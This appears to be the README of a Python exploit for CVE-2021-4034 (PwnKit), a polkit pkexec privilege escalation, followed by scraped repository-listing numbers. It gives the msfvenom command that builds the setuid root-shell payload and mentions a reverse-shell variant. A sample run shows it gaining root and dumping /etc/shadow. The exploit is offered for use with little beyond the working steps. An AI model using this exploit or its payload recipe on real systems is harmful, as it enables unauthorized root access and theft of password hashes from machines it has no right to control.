Python3 code to exploit CVE-2021-4034 (PWNKIT). This was an exercise in "can I make this work in Python?", and not meant as a robust exploit. It Works For Me, there are problaby bugs.
The default payload starts a shell as root, generated from msfvenom:
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
I've tested linux/x64/shell_reverse_tcp as well. Make sure you include the PrependSetuid=true argument to msfvenom, otherwise you'll just get a shell as the user and not root.
The code is cribbed from blasty, the orginal is available here
$ python CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#
![Trewis [work] Scotch](https://avatars.githubusercontent.com/u/92666826?v=4&s=60)
4 Sep 23, 2022
1 Nov 26, 2021
214 Dec 19, 2022
32 Dec 25, 2022
117 Dec 30, 2022
9 Sep 27, 2022
15 Nov 09, 2022
12 Dec 02, 2022
3 Apr 13, 2022
48 Nov 26, 2022
4 Sep 02, 2022
1.9k Dec 30, 2022
1.2k Dec 28, 2022
4 Feb 03, 2022
35 Dec 25, 2022
4.9k Jan 08, 2023
13 Jul 04, 2021
259 Dec 19, 2022
14 Nov 11, 2022
24 Nov 09, 2022